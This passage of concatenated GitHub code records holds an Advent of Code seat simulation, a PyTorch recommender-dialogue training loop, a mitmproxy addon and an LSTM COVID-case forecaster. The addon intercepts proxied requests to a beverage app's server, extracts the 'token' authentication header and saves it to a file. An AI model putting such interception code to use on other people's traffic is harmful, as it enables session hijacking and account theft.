dr\r\n\r\n #p1\r\n #around = [g[i-1][j-1], g[i-1][j], g[i-1][j+1], g[i][j-1],\r\n # g[i][j+1], g[i+1][j-1], g[i+1][j], g[i+1][j+1]]\r\n res = around.count('#')\r\n return res\r\n\r\ndef next_round(grid):\r\n width = len(grid[0])\r\n res = ['.' 
* width]\r\n for i in range(1, len(grid) - 1):\r\n w = '.'\r\n for j in range(1, len(grid) - 1):\r\n cur = grid[i][j]\r\n if cur == '.':\r\n w += '.'\r\n else:\r\n n = count_around(i, j, grid)\r\n if n == 0:\r\n w += '#' \r\n elif n >= 5:\r\n w += 'L'\r\n else:\r\n w += cur\r\n res.append(w + '.')\r\n res.append('.' * width)\r\n return res\r\n\r\ndef count_occ(grid) -> int:\r\n return str(grid).count('#')\r\n\r\ndef prints(seats):\r\n for s in seats:\r\n print(s)\r\n print('--------')\r\n\r\n#inp = '''#.##.##.##\r\n########.##\r\n##.#.#..#..\r\n#####.##.##\r\n##.##.##.##\r\n##.#####.##\r\n#..#.#.....\r\n###########\r\n##.######.#\r\n##.#####.##'''.splitlines()\r\nseats = surround(inp)\r\n\r\ninc = -1\r\nnum_occ = 0\r\n#prints(seats)\r\n\r\nwhile inc != 0:\r\n seats = next_round(seats)\r\n #prints(seats)\r\n new_num_occ = count_occ(seats)\r\n inc = new_num_occ - num_occ\r\n num_occ = new_num_occ\r\n #print(num_occ)\r\nprint(num_occ)\r\n","repo_name":"ntnco/AoC","sub_path":"2020/2020_11.py","file_name":"2020_11.py","file_ext":"py","file_size_in_byte":3168,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"39399777080","text":"import numpy as np\r\nfrom tqdm import tqdm\r\nfrom math import exp\r\nimport os\r\nimport signal\r\nimport json\r\nimport argparse\r\nimport pickle as pkl\r\nfrom dataset import dataset, CRSdataset\r\nfrom model import TransformerModel\r\nimport torch.nn as nn\r\nfrom torch import optim\r\nimport torch\r\ntry:\r\n import torch.version\r\n import torch.distributed as dist\r\n TORCH_AVAILABLE = True\r\nexcept ImportError:\r\n TORCH_AVAILABLE = False\r\nfrom nltk.translate.bleu_score import sentence_bleu\r\nimport nltk\r\nimport re\r\nimport pickle\r\nimport logging\r\nimport ipdb\r\n\r\ndef is_distributed():\r\n \"\"\"\r\n Returns True if we are in distributed mode.\r\n \"\"\"\r\n return TORCH_AVAILABLE and dist.is_available() and dist.is_initialized()\r\n\r\n\r\ndef create_logger(args):\r\n \"\"\"\r\n 将日志输出到日志文件和控制台\r\n \"\"\"\r\n logger = logging.getLogger(__name__)\r\n logger.setLevel(logging.INFO)\r\n\r\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\r\n\r\n # 创建一个handler,用于写入日志文件\r\n file_handler = logging.FileHandler(filename=args.log_path)\r\n file_handler.setFormatter(formatter)\r\n file_handler.setLevel(logging.INFO)\r\n logger.addHandler(file_handler)\r\n\r\n # 创建一个handler,用于将日志输出到控制台\r\n console = logging.StreamHandler()\r\n console.setLevel(logging.DEBUG)\r\n console.setFormatter(formatter)\r\n logger.addHandler(console)\r\n\r\n return logger\r\n\r\n\r\ndef setup_args():\r\n train = argparse.ArgumentParser()\r\n train.add_argument(\"-exp_name\", \"--exp_name\", type=str, default='v1')\r\n\r\n train.add_argument(\"-max_c_length\",\r\n \"--max_c_length\",\r\n type=int,\r\n default=256)\r\n train.add_argument(\"-max_r_length\", \"--max_r_length\", type=int, default=50)\r\n train.add_argument(\"-batch_size\", \"--batch_size\", type=int, default=64)\r\n train.add_argument(\"-max_count\", \"--max_count\", type=int, default=20)\r\n train.add_argument(\"-use_cuda\", \"--use_cuda\", type=bool, default=False)\r\n train.add_argument(\"-process_data\",\r\n \"--process_data\",\r\n type=bool,\r\n default=False)\r\n train.add_argument(\"-load_dict\", \"--load_dict\", type=str, default=None)\r\n train.add_argument(\"-model_save_path\",\r\n \"--model_save_path\",\r\n type=str,\r\n default='saved_model/net_parameter1.pkl')\r\n train.add_argument(\"-learningrate\",\r\n 
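The seat-simulation record above (2020_11.py) pads the grid with a one-cell '.' border via surround(), so the eight-direction scans in count_around never need explicit bounds checks at the edges. The sentinel-border trick in isolation, with a toy grid:

def pad_with_border(grid):
    # Pad a rectangular grid of strings with a one-cell '.' border.
    width = len(grid[0])
    padded = ['.' * (width + 2)]
    padded += ['.' + row + '.' for row in grid]
    padded.append('.' * (width + 2))
    return padded

for row in pad_with_border(['#L', 'L#']):
    print(row)
# ....
# .#L.
# .L#.
# ....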
\"--learningrate\",\r\n type=float,\r\n default=1)\r\n train.add_argument(\"-optimizer\", \"--optimizer\", type=str, default='sgd')\r\n train.add_argument(\"-momentum\", \"--momentum\", type=float, default=0)\r\n train.add_argument(\"-embedding_type\",\r\n \"--embedding_type\",\r\n type=str,\r\n default='random')\r\n train.add_argument(\"-epoch\", \"--epoch\", type=int, default=1000)\r\n train.add_argument(\"-gpu\", \"--gpu\", type=str, default='1')\r\n train.add_argument(\"-gradient_clip\",\r\n \"--gradient_clip\",\r\n type=float,\r\n default=0.1)\r\n train.add_argument(\"-embedding_size\",\r\n \"--embedding_size\",\r\n type=int,\r\n default=300)\r\n\r\n train.add_argument(\"-n_heads\", \"--n_heads\", type=int, default=2)\r\n train.add_argument(\"-n_layers\", \"--n_layers\", type=int, default=2)\r\n train.add_argument(\"-ffn_size\", \"--ffn_size\", type=int, default=300)\r\n\r\n train.add_argument(\"-dropout\", \"--dropout\", type=float, default=0.1)\r\n train.add_argument(\"-attention_dropout\",\r\n \"--attention_dropout\",\r\n type=float,\r\n default=0.0)\r\n train.add_argument(\"-relu_dropout\",\r\n \"--relu_dropout\",\r\n type=float,\r\n default=0.1)\r\n\r\n train.add_argument(\"-learn_positional_embeddings\",\r\n \"--learn_positional_embeddings\",\r\n type=bool,\r\n default=False)\r\n train.add_argument(\"-embeddings_scale\",\r\n \"--embeddings_scale\",\r\n type=bool,\r\n default=True)\r\n\r\n train.add_argument(\"-n_entity\", \"--n_entity\", type=int, default=64368)\r\n train.add_argument(\"-n_relation\", \"--n_relation\", type=int, default=214)\r\n train.add_argument(\"-n_concept\", \"--n_concept\", type=int, default=29308)\r\n train.add_argument(\"-n_con_relation\",\r\n \"--n_con_relation\",\r\n type=int,\r\n default=48)\r\n train.add_argument(\"-dim\", \"--dim\", type=int, default=128)\r\n train.add_argument(\"-n_hop\", \"--n_hop\", type=int, default=2)\r\n train.add_argument(\"-kge_weight\", \"--kge_weight\", type=float, default=1)\r\n train.add_argument(\"-l2_weight\", \"--l2_weight\", type=float, default=2.5e-6)\r\n train.add_argument(\"-n_memory\", \"--n_memory\", type=float, default=32)\r\n train.add_argument(\"-item_update_mode\",\r\n \"--item_update_mode\",\r\n type=str,\r\n default='0,1')\r\n train.add_argument(\"-using_all_hops\",\r\n \"--using_all_hops\",\r\n type=bool,\r\n default=True)\r\n train.add_argument(\"-num_bases\", \"--num_bases\", type=int, default=8)\r\n\r\n train.add_argument(\"-same_data\", \"--same_data\", type=bool, default=False)\r\n # train.add_argument(\"--bpe2vec\",type=str,default='../../data/bpe2vec.npy')\r\n train.add_argument(\"--bpe2index\",\r\n type=str,\r\n default='../../data/data1030/output/bpe2index.json')\r\n train.add_argument('--do_eval', action='store_true', default=False)\r\n\r\n train.add_argument(\"-train_data_file\",\r\n \"--train_data_file\",\r\n type=str,\r\n default=\"../../data/data1030/output/train_cut.pkl\",\r\n help='要处理的数据的位置')\r\n train.add_argument(\"-valid_data_file\",\r\n \"--valid_data_file\",\r\n type=str,\r\n default=\"../../data/data1030/output/valid_cut.pkl\",\r\n help='要处理的数据的位置')\r\n train.add_argument(\"-test_data_file\",\r\n \"--test_data_file\",\r\n type=str,\r\n default=\"../../data/data1030/output/test_cut.pkl\",\r\n help='要处理的数据的位置')\r\n\r\n train.add_argument('--log_path',\r\n default='log/{}.log',\r\n type=str,\r\n required=False,\r\n help='训练日志存放位置') #todo\r\n train.add_argument(\"-use_size\", \"--use_size\", type=int,\r\n default=-1) # pad_size,与其他模型不统一\r\n return train\r\n\r\n\r\ndef 
_create_dictionary():\r\n '''\r\n word2index\r\n '''\r\n pass\r\n return {}\r\n\r\n\r\nclass TrainLoop_Transformer():\r\n def __init__(self, opt):\r\n self.opt = opt\r\n\r\n self.dict = json.load(open(args.bpe2index, encoding='utf-8'))\r\n self.index2word = {self.dict[key]: key for key in self.dict}\r\n\r\n self.batch_size = self.opt['batch_size']\r\n self.epoch = self.opt['epoch']\r\n self.use_cuda = opt['use_cuda']\r\n print('self.use_cuda:', self.use_cuda)\r\n\r\n self.device = 'cuda:{}'.format(\r\n self.opt['gpu']) if self.use_cuda else 'cpu'\r\n self.opt['device'] = self.device\r\n\r\n self.movie_ids = pkl.load(open(\"data/movie_ids.pkl\", \"rb\"))\r\n\r\n # self.metrics_gen = {\r\n # \"ppl\": 0,\r\n # \"dist1\": 0,\r\n # \"dist2\": 0,\r\n # \"dist3\": 0,\r\n # \"dist4\": 0,\r\n # \"bleu1\": 0,\r\n # \"bleu2\": 0,\r\n # \"bleu3\": 0,\r\n # \"bleu4\": 0,\r\n # \"count\": 0\r\n # }\r\n\r\n self.build_data()\r\n self.build_model()\r\n\r\n # self.init_optim(\r\n # [p for p in self.model.parameters() if p.requires_grad],\r\n # optim_states=states.get('optimizer'),\r\n # saved_optim_type=states.get('optimizer_type')\r\n # )\r\n self.init_optim(\r\n [p for p in self.model.parameters() if p.requires_grad])\r\n\r\n def build_data(self):\r\n if self.opt['process_data']:\r\n self.train_dataset = dataset(\r\n \"../../data/data1030/output/train_cut.pkl\", self.opt, 'train')\r\n self.valid_dataset = dataset(\r\n \"../../data/data1030/output/valid_cut.pkl\", self.opt, 'valid')\r\n self.test_dataset = dataset(\r\n \"../../data/data1030/output/test_cut.pkl\", self.opt, 'test')\r\n\r\n self.train_processed_set = self.train_dataset.data_process(True)\r\n self.valid_processed_set = self.valid_dataset.data_process(True)\r\n self.test_processed_set = self.test_dataset.data_process(True)\r\n\r\n pickle.dump(self.train_processed_set,\r\n open('data/train_processed_set.pkl', 'wb'))\r\n pickle.dump(self.valid_processed_set,\r\n open('data/valid_processed_set.pkl', 'wb'))\r\n pickle.dump(self.test_processed_set,\r\n open('data/test_processed_set.pkl', 'wb'))\r\n logger.info(\"[Save processed data]\")\r\n else:\r\n try:\r\n self.train_processed_set = pickle.load(\r\n open('data/train_processed_set.pkl', 'rb'))\r\n self.valid_processed_set = pickle.load(\r\n open('data/valid_processed_set.pkl', 'rb'))\r\n self.test_processed_set = pickle.load(\r\n open('data/test_processed_set.pkl', 'rb'))\r\n except:\r\n assert 1 == 0, \"No processed data\"\r\n logger.info(\"[Load processed data]\")\r\n\r\n def build_model(self):\r\n self.model = TransformerModel(self.opt, self.dict)\r\n # todo\r\n if self.opt['embedding_type'] != 'random':\r\n pass\r\n\r\n if self.opt['load_dict'] is not None:\r\n logger.info('[ Loading existing model params from {} ]'\r\n ''.format(self.opt['load_dict']))\r\n self.model.load_model(self.opt['load_dict'])\r\n\r\n if self.use_cuda:\r\n self.model.to(self.device)\r\n\r\n def train(self):\r\n losses = []\r\n best_val_gen = 1000\r\n gen_stop = False\r\n patience = 0\r\n max_patience = 5\r\n num = 0\r\n\r\n # file_temp = open('temp.txt', 'w')\r\n # train_output_file = open(f\"output_train_tf.txt\", 'w', encoding='utf-8')\r\n\r\n for i in range(self.epoch):\r\n train_set = CRSdataset(self.train_processed_set,\r\n self.opt['n_entity'], self.opt['n_concept'])\r\n train_dataset_loader = torch.utils.data.DataLoader(\r\n dataset=train_set, batch_size=self.batch_size,\r\n shuffle=True) # shuffle\r\n\r\n for context,c_lengths,response,r_length,mask_response, \\\r\n 
mask_r_length,entity,entity_vector,movie,\\\r\n concept_mask,dbpedia_mask,concept_vec, \\\r\n db_vec,rec in tqdm(train_dataset_loader):\r\n ####################################### 检验输入输出ok\r\n # file_temp.writelines(\"[Context] \", self.vector2sentence(context))\r\n # file_temp.writelines(\"[Response] \", self.vector2sentence(response))\r\n # file_temp.writelines(\"\\n\")\r\n\r\n seed_sets = []\r\n batch_size = context.shape[0]\r\n for b in range(batch_size):\r\n seed_set = entity[b].nonzero().view(-1).tolist()\r\n seed_sets.append(seed_set)\r\n\r\n self.model.train()\r\n self.zero_grad()\r\n\r\n scores, preds, rec_scores, rec_loss, gen_loss, mask_loss, info_db_loss, info_con_loss= \\\r\n self.model(context.to(self.device), response.to(self.device), mask_response.to(self.device), concept_mask, dbpedia_mask, seed_sets, movie, \\\r\n concept_vec, db_vec, entity_vector.to(self.device), rec, test=False)\r\n\r\n ##########################################\r\n # train_output_file.writelines(\r\n # [\"Loss per batch = %f\\n\" % gen_loss.item()])\r\n # train_output_file.writelines(['[GroundTruth] ' + ' '.join(sen_gt)+'\\n' \\\r\n # + '[Generated] ' + ' '.join(sen_gen)+'\\n\\n' \\\r\n # for sen_gt, sen_gen in zip(self.vector2sentence(response.cpu()), self.vector2sentence(preds.cpu()))])\r\n\r\n losses.append([gen_loss])\r\n self.backward(gen_loss)\r\n self.update_params()\r\n\r\n if num % 50 == 0:\r\n loss = sum([l[0] for l in losses]) / len(losses)\r\n ppl = exp(loss)\r\n logger.info('gen loss is %f, ppl is %f' % (loss, ppl))\r\n losses = []\r\n\r\n num += 1\r\n\r\n output_metrics_gen = self.val(epoch=i)\r\n _ = self.val(True, epoch=i)\r\n\r\n if best_val_gen < output_metrics_gen[\"ppl\"]:\r\n patience += 1\r\n logger.info('Patience = ', patience)\r\n if patience >= 5:\r\n gen_stop = True\r\n else:\r\n patience = 0\r\n best_val_gen = output_metrics_gen[\"ppl\"]\r\n self.model.save_model(self.opt['model_save_path'])\r\n logger.info(\r\n f\"[generator model saved in {self.opt['model_save_path']}\"\r\n \"------------------------------------------------]\")\r\n\r\n if gen_stop:\r\n break\r\n\r\n # train_output_file.close()\r\n # _ = self.val(is_test=True)\r\n\r\n def val(self, is_test=False, epoch=-1):\r\n # count是response数量\r\n self.model.eval()\r\n if is_test:\r\n valid_processed_set = self.test_processed_set\r\n else:\r\n valid_processed_set = self.valid_processed_set\r\n\r\n val_set = CRSdataset(valid_processed_set, self.opt['n_entity'],\r\n self.opt['n_concept'])\r\n val_dataset_loader = torch.utils.data.DataLoader(\r\n dataset=val_set, batch_size=self.batch_size, shuffle=False)\r\n\r\n inference_sum = []\r\n tf_inference_sum = []\r\n golden_sum = []\r\n # context_sum = []\r\n losses = []\r\n recs = []\r\n\r\n for context, c_lengths, response, r_length, mask_response, mask_r_length, \\\r\n entity, entity_vector, movie, concept_mask, dbpedia_mask, concept_vec, db_vec, rec \\\r\n in tqdm(val_dataset_loader):\r\n with torch.no_grad():\r\n seed_sets = []\r\n batch_size = context.shape[0]\r\n for b in range(batch_size):\r\n seed_set = entity[b].nonzero().view(-1).tolist()\r\n seed_sets.append(seed_set)\r\n\r\n # 使用teacher force下的回复生成,\r\n _, tf_preds, _, _, gen_loss, mask_loss, info_db_loss, info_con_loss = \\\r\n self.model(context.to(self.device), response.to(self.device), mask_response.to(self.device), concept_mask, dbpedia_mask, \\\r\n seed_sets, movie, concept_vec, db_vec, entity_vector.to(self.device), rec, test=False)\r\n\r\n # 使用greedy模式下的回复生成,限定maxlen=20?\r\n # todo\r\n scores, preds, 
rec_scores, rec_loss, _, mask_loss, info_db_loss, info_con_loss = \\\r\n self.model(context.to(self.device), response.to(self.device), mask_response.to(self.device), concept_mask, dbpedia_mask, \\\r\n seed_sets, movie, concept_vec, db_vec, entity_vector.to(self.device), rec, test=True, maxlen=20, bsz=batch_size)\r\n\r\n golden_sum.extend(self.vector2sentence(response.cpu()))\r\n inference_sum.extend(self.vector2sentence(preds.cpu()))\r\n # tf_inference_sum.extend(self.vector2sentence(tf_preds.cpu()))\r\n # context_sum.extend(self.vector2sentence(context.cpu()))\r\n recs.extend(rec.cpu())\r\n losses.append(torch.mean(gen_loss))\r\n #logger.info(losses)\r\n #exit()\r\n\r\n subset = 'valid' if not is_test else 'test'\r\n\r\n # 原版: gen-loss来自teacher force,inference_sum来自greedy\r\n ppl = exp(sum(loss for loss in losses) / len(losses))\r\n output_dict_gen = {'ppl': ppl}\r\n logger.info(f\"{subset} set metrics = {output_dict_gen}\")\r\n # logger.info(f\"{subset} set gt metrics = {self.metrics_gt}\")\r\n\r\n # f=open('context_test.txt','w',encoding='utf-8')\r\n # f.writelines([' '.join(sen)+'\\n' for sen in context_sum])\r\n # f.close()\r\n\r\n # 将生成的回复输出\r\n with open(f\"output/output_{subset}_gen_epoch_{epoch}.txt\",\r\n 'w',\r\n encoding='utf-8') as f:\r\n f.writelines([\r\n '[Generated] ' + re.sub('@\\d+', '__UNK__', ' '.join(sen)) +\r\n '\\n' for sen in inference_sum\r\n ])\r\n\r\n # gt shuchu\r\n with open(f\"output/output_{subset}_gt_epoch_{epoch}.txt\",\r\n 'w',\r\n encoding='utf-8') as f:\r\n for sen in golden_sum:\r\n mask_sen = re.sub('@\\d+', '__UNK__', ' '.join(sen))\r\n mask_sen = re.sub(' ([!,.?])', '\\\\1', mask_sen)\r\n f.writelines(['[GT] ' + mask_sen + '\\n'])\r\n\r\n # 将生成的回复与gt一起输出\r\n with open(f\"output/output_{subset}_both_epoch_{epoch}.txt\",\r\n 'w',\r\n encoding='utf-8') as f:\r\n f.writelines(['[GroundTruth] ' + re.sub('@\\d+', '__UNK__',' '.join(sen_gt))+'\\n' \\\r\n + '[Generated] ' + re.sub('@\\d+', '__UNK__',' '.join(sen_gen))+'\\n\\n' \\\r\n for sen_gt, sen_gen in zip(golden_sum, inference_sum)])\r\n\r\n self.save_embedding()\r\n\r\n return output_dict_gen\r\n\r\n def save_embedding(self):\r\n json.dump(loop.dict, open('output/tf_bpe2index.json', 'w'))\r\n\r\n def vector2sentence(self, batch_sen):\r\n # 一个batch的sentence 从id换成token\r\n sentences = []\r\n for sen in batch_sen.numpy().tolist():\r\n sentence = []\r\n for word in sen:\r\n if word > 3:\r\n sentence.append(self.index2word[word])\r\n elif word == 3:\r\n sentence.append('_UNK_')\r\n sentences.append(sentence)\r\n return sentences\r\n\r\n @classmethod\r\n def optim_opts(self):\r\n \"\"\"\r\n Fetch optimizer selection.\r\n\r\n By default, collects everything in torch.optim, as well as importing:\r\n - qhm / qhmadam if installed from github.com/facebookresearch/qhoptim\r\n\r\n Override this (and probably call super()) to add your own optimizers.\r\n \"\"\"\r\n # first pull torch.optim in\r\n optims = {\r\n k.lower(): v\r\n for k, v in optim.__dict__.items()\r\n if not k.startswith('__') and k[0].isupper()\r\n }\r\n try:\r\n import apex.optimizers.fused_adam as fused_adam\r\n optims['fused_adam'] = fused_adam.FusedAdam\r\n except ImportError:\r\n pass\r\n\r\n try:\r\n # https://openreview.net/pdf?id=S1fUpoR5FQ\r\n from qhoptim.pyt import QHM, QHAdam\r\n optims['qhm'] = QHM\r\n optims['qhadam'] = QHAdam\r\n except ImportError:\r\n # no QHM installed\r\n pass\r\n logger.info(optims)\r\n return optims\r\n\r\n def init_optim(self, params, optim_states=None, saved_optim_type=None):\r\n \"\"\"\r\n Initialize 
optimizer with model parameters.\r\n\r\n :param params:\r\n parameters from the model\r\n\r\n :param optim_states:\r\n optional argument providing states of optimizer to load\r\n\r\n :param saved_optim_type:\r\n type of optimizer being loaded, if changed will skip loading\r\n optimizer states\r\n \"\"\"\r\n\r\n opt = self.opt\r\n\r\n # set up optimizer args\r\n lr = opt['learningrate']\r\n kwargs = {'lr': lr}\r\n # kwargs['amsgrad'] = True\r\n # kwargs['betas'] = (0.9, 0.999)\r\n\r\n optim_class = self.optim_opts()[opt['optimizer']]\r\n logger.info(f'optim_class = {optim_class}')\r\n self.optimizer = optim_class(params, **kwargs)\r\n\r\n def backward(self, loss):\r\n \"\"\"\r\n Perform a backward pass. It is recommended you use this instead of\r\n loss.backward(), for integration with distributed training and FP16\r\n training.\r\n \"\"\"\r\n loss.backward()\r\n\r\n def update_params(self):\r\n \"\"\"\r\n Perform step of optimization, clipping gradients and adjusting LR\r\n schedule if needed. Gradient accumulation is also performed if agent\r\n is called with --update-freq.\r\n\r\n It is recommended (but not forced) that you call this in train_step.\r\n \"\"\"\r\n update_freq = 1\r\n if update_freq > 1:\r\n # we're doing gradient accumulation, so we don't only want to step\r\n # every N updates instead\r\n self._number_grad_accum = (self._number_grad_accum +\r\n 1) % update_freq\r\n if self._number_grad_accum != 0:\r\n return\r\n #0.1是不是太小了,原版就是这样\r\n if self.opt['gradient_clip'] > 0:\r\n torch.nn.utils.clip_grad_norm_(self.model.parameters(),\r\n self.opt['gradient_clip'])\r\n\r\n self.optimizer.step()\r\n\r\n def zero_grad(self):\r\n \"\"\"\r\n Zero out optimizer.\r\n\r\n It is recommended you call this in train_step. It automatically handles\r\n gradient accumulation if agent is called with --update-freq.\r\n \"\"\"\r\n self.optimizer.zero_grad()\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n args = setup_args().parse_args()\r\n args.log_path = args.log_path.format(args.exp_name)\r\n print(args.use_cuda)\r\n print(args.process_data)\r\n\r\n global logger\r\n logger = create_logger(args)\r\n logger.info(vars(args))\r\n\r\n loop = TrainLoop_Transformer(vars(args))\r\n if args.do_eval:\r\n loop.val(True)\r\n else:\r\n loop.train()\r\n","repo_name":"Zyh716/TG_CRS_Code","sub_path":"Conversation/Transformer/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":22708,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"34"} +{"seq_id":"70224505057","text":"\nimport mitmproxy.http\nfrom .utils import *\n\nclass leafxcy_JavaScript_ksfcys(object):\n def __init__(self,child_conn,temp_folder='temp'):\n # app\n self.app = '康师傅畅饮社'\n # result of capture\n self.res = {\n 'ksfcysToken':''\n }\n # ini\n self.count = 0\n self.table = {}\n self.toml_path = f'{temp_folder}/{self.app}.toml'\n self.child_conn = child_conn\n\n def request(self,flow: mitmproxy.http.HTTPFlow):\n # \n if self.count == 0:\n if flow.request.pretty_url.startswith('https://club.biqr.cn/'):\n headers = {k.lower():v for k,v in dict(flow.request.headers).items()}\n if 'token' in headers.keys():\n self.res['ksfcysToken'] = headers.get('token')\n # check res and save\n if all(self.res.values()):\n self.table[self.app] = [self.res]\n self.count = 1\n sendlog(self.child_conn,f'{self.app} success!'+'&&&'+dict2conf(self.res))\n save_toml(self.table,self.toml_path)\n 
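The mitmproxy addon record above keys on a URL prefix and lifts a token header out of matching requests. A stripped-down, self-contained sketch of the same capture pattern; the URL and header name here are placeholders rather than the original app's values:

import mitmproxy.http

class TokenGrabber:
    def __init__(self):
        self.token = None

    def request(self, flow: mitmproxy.http.HTTPFlow):
        # Only inspect traffic for the service we care about.
        if not flow.request.pretty_url.startswith("https://example.com/"):
            return
        # Header lookup is case-insensitive in mitmproxy.
        token = flow.request.headers.get("token")
        if token and self.token is None:
            self.token = token
            print(f"captured token: {token}")

# mitmproxy discovers addons through this module-level list:
#   mitmdump -s token_grabber.py
addons = [TokenGrabber()]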
","repo_name":"HanEightTurtle/mitm_server_ql","sub_path":"addons/leafxcy_JavaScript_ksfcys.py","file_name":"leafxcy_JavaScript_ksfcys.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"34"} +{"seq_id":"72605160736","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jun 24 09:28:49 2022\n\n@author: Amirah Heng\n\"\"\"\n\nimport os\nimport pickle\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom tensorflow.keras.utils import plot_model\nfrom sklearn.preprocessing import MinMaxScaler\nfrom tensorflow.keras.callbacks import TensorBoard\nfrom Malaysia_Covid_Case_Module import ModelEvaluation,EDA\nfrom sklearn.metrics import mean_absolute_percentage_error\nfrom sklearn.metrics import mean_absolute_error,mean_squared_error\nfrom Malaysia_Covid_Case_Module import ModelCreation, ModelAnalysis\n#%%Statics\n\nlog_dir = datetime.datetime.now().strftime(\"%Y%m%d-%H%M%S\")\nLOG_PATH = os.path.join(os.getcwd(),'logs', log_dir)\nTRAIN_PATH= os.path.join(os.getcwd(),'dataset','cases_malaysia_train.csv')\nTEST_PATH = os.path.join(os.getcwd(),'dataset','cases_malaysia_test.csv')\nMMS_PATH= os.path.join(os.getcwd(),'model', 'mms.pkl')\nMODEL_SAVE_PATH = os.path.join(os.getcwd(),'model','model.h5')\n#%% STEP 1 - Data Loading\n\ndf = pd.read_csv(TRAIN_PATH)\n\n#%% STEP 2 - Data Inspection\n\ndf.info() #There are 30 columns in this data \ndf.tail(10) #679 dataset available in this\n\n#Describe data mean,median, IQR\ntemp= df.describe().T \n\n#Change all cases to float data\nfor i in df.columns:\n df[i]=pd.to_numeric(df[i],errors='coerce')\n\n#Plot graphs\nEDA().plot_graph(df)\n\n#Check for missing datas/NaN values\ndf.isna().sum() #There are 342 missing datas from cluster_import ,cluster_religious,\n# cluster_community , cluster_education ,cluster_detentionCentre , cluster_workplace \n \ndf.duplicated().sum() #no duplicated data in this dataset\n\n#Check for outliers\ndf.boxplot(figsize=(40,15)) #Cases_active\n\n#%% STEP 3 - Data Cleaning\n\n#Interpolate data to fill in NaN values\ndf.isna().sum() \n\n#cases_new data shows a degree 3 wave graph hence polynomial degree 3 is used to interpolate\ndf['cases_new'].interpolate(method='polynomial', order=2, inplace=True)\n\ndf['cases_new'].isna().sum()\n#Plot graph for target column\n# EDA().plot_covid_data(column_names, dataset=df['cases_new'])\n \nplt.figure()\nplt.plot(df['cases_new'])\nplt.xlabel('cases_new')\nplt.show()\n\n\n#%% STEP 4 - Features Selection\n#Cases new will be the selected data for this model\n#%% STEP 5 - Preprocessing\n\nmms = MinMaxScaler()\ndf = mms.fit_transform(np.expand_dims(df['cases_new'],axis=-1))\n\n#Create a container to develop model\nX_train = []\ny_train = []\n\nwin_size = 30\n\nfor i in range(win_size, np.shape(df)[0]):\n X_train.append(df[i-win_size:i, 0])\n y_train.append(df[i, 0])\n\nX_train = np.array(X_train) \ny_train = np.array(y_train) \n\n\n#%% STEP 6 - Model Development\n# USE LSTM layers, dropout, dense, input\n\nnb_features=np.shape(X_train)[1] #30\n\nMC= ModelCreation()\nmodel = MC.simple_lstm_layer(nb_features,num_node=64,drop_rate=0.2,\n output_node=1)\n\n#%% STEP 7) MODEL ANALYSIS\n\n#Show model architecture\nplot_model(model,show_layer_names=(True), show_shapes=(True))\n\n#compile model \nmodel.compile(optimizer='adam', loss='mse', metrics ='mape')\n\nX_train = np.expand_dims(X_train, axis=-1) #(30,1)\n\n#callbacks\ntensorboard_callback= TensorBoard(log_dir=LOG_PATH)\n\n#Train 
and test model created\nhist= model.fit(X_train, y_train, batch_size=20, epochs=200,\n callbacks=tensorboard_callback)\n\n# Evaluate model loss and mape in graph plot\nMA= ModelAnalysis()\nMA.PlotHistory(hist)\n\n#%% STEP 8 - Model Evaluation\n\ntest_df = pd.read_csv(TEST_PATH)\n\n#Change cases_new to float data\ntest_df.iloc[:,1]=pd.to_numeric(test_df.iloc[:,1],errors='coerce')\n\n#There is 1 NaN in test dataset\ntest_df.isna().sum()\n\n#Interpolate data to remove NaN\ntest_df['cases_new'].interpolate(method='polynomial', order=2,inplace=True)\n\ntest_df = mms.transform(np.expand_dims(test_df.iloc[:,1],axis=-1))\n\n# Concatenate test_df + df \ncon_test = np.concatenate((df,test_df),axis=0)\ncon_test = con_test[-(win_size+len(test_df)):] \n\nplt.figure()\nplt.plot(test_df)\nplt.show()\n\nX_test =[]\nfor i in range(win_size, len(con_test)): #(30,130)\n X_test.append(con_test[i-win_size:i , 0])\n \n#1st iteration ---> i=30 get first 30days of data\n#2nd iteration ---> i=31 get next 30days of data\n#first row of data can predict next row of data\n\nX_test = np.array(X_test)\npredicted= model.predict(np.expand_dims(X_test,axis=-1))\n\ntest_df_inverse=mms.inverse_transform(test_df)\n\npredicted_inverse = mms.inverse_transform(predicted)\n\n#%%Plotting of graphs\n\nME= ModelEvaluation()\nME.plot_predicted_graph(test_df,predicted)\n\n#%% MAPE value\n\nprint(\"The mean_absolute_percentage_error(MAPE) value is:\",mean_absolute_percentage_error(test_df_inverse, predicted_inverse))\nprint(\"The mean_squared_error: value is\", mean_squared_error(test_df_inverse, predicted_inverse))\nprint(\"The mean_absolute_error: value is\", mean_absolute_error(test_df_inverse, predicted_inverse))\n\n# print((mean_absolute_error(test_df, predicted)/sum(abs(test_df))) *100)\n#%% Step 9) Model Saving\n\n#Save Model\nmodel.save(MODEL_SAVE_PATH)\n#Save scaler model\nwith open(MMS_PATH, 'wb') as file:\n pickle.dump(mms, file)\n\n#%% Discussion)\n\n# The MAPE value achieved is 0.11 which is high in performance\n# A simple LSTM, Dense, and Dropout layers is implemented in this model.\n# The MAPE loss can be further reduced in the future with some suggested approach:\n # 1) Increasing number of samples in the dataset\n # 2) Increasing the number of epochs\n # 3) Introduce different model architectures \n\n# A simple Long Short-Term Memory (LSTM) model is implemented with\n# with an input layer, a single hidden (LSTM) layer, and an output layer \n# that is used to make a prediction. The input layer has neurons equal to 30\n# sequence steps (for 30 days COVID-19 data points). \n# The hidden layer is an LSTM layer with 64 hidden units (neurons) \n# and a rectified linear unit (ReLU) as an activation function. \n# The output layer had a dense layer with 1 unit for predicting the output. \n# Moreover, we have set 300 as the number of epochs, Adam as the optimizer, \n# and the mape as the loss function. \n# After that, we fit the model with prepared data to make a prediction. \n# The obtained results may vary given the stochastic nature of the LSTM model; \n# therefore, we have run it several times. 
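The windowing step in the COVID-prediction record above can be exercised on toy data: each consecutive win_size-long slice of the scaled series becomes one input row, and the value that follows it becomes the target. A small sketch of that series-to-supervised conversion (shapes only, no real data):

import numpy as np

def make_windows(series, win_size):
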